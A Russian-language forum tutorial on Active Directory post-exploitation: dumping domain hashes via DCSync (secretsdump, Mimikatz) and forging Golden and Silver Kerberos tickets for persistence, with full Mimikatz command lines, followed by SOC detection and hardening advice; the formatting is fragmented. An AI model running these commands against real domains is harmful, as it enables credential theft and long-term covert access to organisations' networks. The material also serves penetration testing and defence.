![]() |
https://forum.antichat.xyz/attachmen...caaa7ece24.png
Ты получил Domain Admin. Отработал Kerberoasting, поднял привилегии через делегирование, или просто нашёл пароль DA в SYSVOL-скрипте (все эти техники - от разведки до первого DA - разобраны в полном гайде по пентесту Active Directory) (да, в 2025 году это всё ещё работает). Вопрос в другом: что дальше? Как закрепиться в домене так, чтобы даже после смены пароля скомпрометированной учётки ты сохранил доступ? Ответ - DCSync для дампа хэшей, а затем Golden и Silver Ticket для персистентности через форжинг Kerberos-тикетов. Полная цепочка post-exploitation атак на контроллер домена Active Directory: от репликации учётных данных через DCSync до создания «бессмертных» билетов Kerberos. Каждый шаг - с командами, разбором того, что происходит на уровне протокола, и тем, как SOC может это поймать. Что такое DCSync и почему это ключевая атака на Kerberos DCSync - техника дампа хэшей паролей домена, которая эксплуатирует легитимный механизм репликации Active Directory. Вместо того чтобы заходить на контроллер домена и тянуть файл NTDS.dit (что шумно и требует физического или RDP-доступа к DC), ты прикидываешься вторым контроллером домена и запрашиваешь у настоящего DC репликацию учётных данных через протокол MS-DRSR (Directory Replication Service Remote Protocol). По классификации MITRE ATT&CK - подтехника T1003.006 (DCSync). Технику активно используют APT-группы: по данным MITRE, та же LAPSUS$ применяла DCSync для извлечения учётных данных из скомпрометированных контроллеров. Какие права нужны для DCSync атаки Active Directory DCSync - не уязвимость, а злоупотребление штатной функциональностью. Для выполнения атаки учётная запись должна иметь расширенные привилегии на объекте домена:
Проверить, у кого есть права на DCSync, проще всего через BloodHound - он визуализирует пути атаки и явно показывает объекты с привилегиями Код:
GetChangesКод:
GetChangesAllПрактика: дамп хэшей через Impacket secretsdump На Linux-хосте атакующего DCSync выполняется через Код:
secretsdump.pyКод:
DsGetNCChangesBash: Код:
# DCSync с использованием пароля в открытом видеКод:
secretsdumpКод:
CIFS/dc01.corp.localКод:
LDAP/dc01.corp.localПосле выполнения Код:
secretsdumpКод:
dcsync.ntdsКод:
dcsync.ntds.kerberosКод:
dcsync.ntds.cleartextDCSync через Mimikatz На Windows-хосте DCSync атака выполняется через модуль Код:
lsadump::dcsyncКод: Код:
# Дамп хэша конкретного пользователя (например, krbtgt)Код:
krbtgtGolden Ticket: подделка TGT для полного контроля домена Golden Ticket - поддельный Ticket Granting Ticket (TGT), подписанный хэшем учётной записи Код:
krbtgtПочему Golden Ticket работает Каждый раз, когда пользователь аутентифицируется в домене, KDC (Key Distribution Center) на контроллере домена выдаёт ему TGT - зашифрованный и подписанный ключом учётной записи Код:
krbtgtКод:
krbtgtА теперь самое интересное: контроллер домена доверяет TGT, если тикет корректно зашифрован ключом Код:
krbtgtКод:
krbtgtОговорка: на контроллерах домена с установленным KB5008380 (enforcement с октября 2022) Golden Ticket с несуществующим именем пользователя будет отклонён из-за PAC requestor validation. Для обхода нужно использовать имя реально существующего пользователя. На непропатченных DC этого ограничения нет. Создание Golden Ticket через Mimikatz Для создания Golden Ticket нужны:
Код: Код:
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:a1b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8 /id:500 /groups:513,512,519,518,520 /pttПараметрНазначение Код:
/userКод:
/domainКод:
/sidКод:
/krbtgtКод:
/idКод:
/groupsКод:
/groupsКод:
/sids:S-1-5-21--519Код:
/pttКод:
/ticketКод:
/pttКод:
.kirbiGolden Ticket через Impacket Bash: Код:
# Создание Golden Ticket и сохранение в файл .ccacheGolden Ticket живёт до тех пор, пока не будет дважды сменён пароль учётной записи Код:
krbtgtКод:
krbtgtА теперь грустная правда: пароль Код:
krbtgtКод:
krbtgtКод:
krbtgtSilver Ticket: атака на конкретный сервис без обращения к DC Silver Ticket - поддельный Ticket Granting Service (TGS), подписанный хэшем учётной записи конкретного сервиса. Техника T1558.002 в MITRE ATT&CK (Steal or Forge Kerberos Tickets: Silver Ticket, тактика Credential Access). Чем Silver Ticket отличается от Golden Ticket Golden Ticket - поддельный TGT, который предъявляется контроллеру домена для получения сервисных тикетов. Silver Ticket - поддельный TGS, который предъявляется непосредственно целевому сервису. При использовании Silver Ticket контроллер домена вообще не участвует - нет AS-REQ, нет AS-REP, нет TGS-REQ, нет TGS-REP. Тишина в логах DC. Sean Metcalf (adsecurity.org) считает, что Silver Ticket может быть опаснее Golden Ticket: область действия ограничена конкретным сервисом, зато для создания нужен только хэш сервисного аккаунта (а не krbtgt), и отсутствие коммуникации с DC делает обнаружение значительно сложнее. Лично я с этим согласен - на нескольких проектах Silver Ticket на CIFS к файловому серверу оставался незамеченным неделями. Исторически большинство сервисов в Windows не валидировали PAC (Privilege Attribute Certificate) - не отправляли контрольную сумму PAC на контроллер домена для проверки. С ноября 2022 года (KB5020009, enforcement phase) Microsoft включила обязательную проверку PAC-подписи. На полностью пропатченных системах Silver Ticket с фиктивным PAC будет отклонён. Но в реальных средах непропатченные серверы - обычное дело. На таких хостах атакующий создаёт Silver Ticket с фиктивным PAC, указывает членство в группе Domain Admins, и целевой сервис принимает его без вопросов. Создание Silver Ticket через Mimikatz Для Silver Ticket нужны:
Код: Код:
mimikatz # kerberos::golden /admin:ЛюбоеИмя /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:fileserver.corp.local /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /pttКод:
kerberos::goldenКод:
/targetКод:
/serviceПопулярные SPN для Silver Ticket атаки Сервис (SPN)Что даёт атакующему Код:
cifsКод:
httpКод:
mssqlКод:
hostКод:
ldapКод:
wsmanОбрати внимание на Код:
ldapОткуда берётся хэш для Silver Ticket Для компьютерных аккаунтов хэш можно стянуть несколькими путями:
Код: Код:
mimikatz # privilege::debug
Код: Код:
mimikatz # lsadump::dcsync /domain:corp.local /user:FILESERVER$
КритерийGolden TicketSilver TicketТип тикетаTGT (Ticket Granting Ticket)TGS (Ticket Granting Service)Какой хэш нуженkrbtgtСервисный или компьютерный аккаунтОбласть действияВесь домен - любой сервисКонкретный сервис на конкретном сервереОбращение к DCДа - клиент предъявляет TGT контроллеру домена в TGS-REQ для получения сервисного тикетаНет на непропатченных системах; на системах с KB5020009 сервис обращается к DC для валидации PACОбнаружениеСредняя сложность - логи на DCВысокая сложность - логи только на целевом хостеСрок жизниДо двойной смены пароля krbtgtДо смены пароля сервисного аккаунтаMITRE ATT&CK IDT1558.001T1558.002 На практике я использую оба в зависимости от задачи. Golden Ticket - когда нужен полный контроль и возможность ходить по всему домену. Silver Ticket - когда нужно тихо закрепиться на конкретном сервере (файловом или SQL), минимизируя следы в логах контроллера домена. На одном проекте мы держали Silver Ticket на MSSQL три недели - SOC ни разу не среагировал, потому что логи с SQL-сервера в SIEM просто не пересылались. Полная цепочка атаки: пошаговый сценарий Допустим, ты получил права Domain Admin через атаку на делегирование или Kerberoasting. Вот полная последовательность действий для закрепления в домене. 📚 Часть контента скрыта. Этот материал доступен участникам сообщества с рангом One Level или выше Получить доступ просто — достаточно проявить активность на форуме Детектирование атак на контроллер домена Active Directory Детектирование DCSync DCSync оставляет характерные следы в логах Security на контроллере домена:
Код:
DsGetNCChangesКод: Код:
# Пример корреляции в SIEM (псевдокод)Golden Ticket ловится по аномалиям в Event ID 4769 (A Kerberos service ticket was requested) - запрос сервисного тикета без предшествующего Event ID 4768 (AS-REQ). Golden Ticket не генерирует 4768 на DC, потому что TGT создаётся офлайн - это и есть главный индикатор. На что смотреть в 4769:
Детектирование Silver Ticket Silver Ticket - самый неприятный для SOC тип атаки, потому что все логи остаются на целевом сервере, а не на DC. Признаки:
Привилегированный доступ Active Directory: защита от DCSync и тикетных атак Против DCSync:
Описанные техники не живут в вакууме. Они встраиваются в общую цепочку lateral movement и персистентности:
Итоги: что запомнить DCSync, Golden Ticket и Silver Ticket - три столпа post-exploitation в Active Directory. DCSync даёт хэши. Golden Ticket даёт неограниченный доступ ко всему домену. Silver Ticket даёт тихий доступ к конкретному сервису. Вместе они формируют персистентность, которая переживёт смену паролей обычных пользователей, переустановку рабочих станций и даже частичный incident response - если команда защиты не знает, что нужно дважды менять пароль Код:
krbtgtЕсли ты пентестер - отработай эту цепочку до автоматизма. Если защитник - настраивай мониторинг на Event ID 4662, 4769, 4768, внедряй Tiering, ротируй Код:
krbtgtПроверь прямо сейчас: когда в последний раз менялся пароль Код:
krbtgtКод:
Get-ADUser krbtgt -Properties PasswordLastSet | Select PasswordLastSet |
| Время: 15:27 |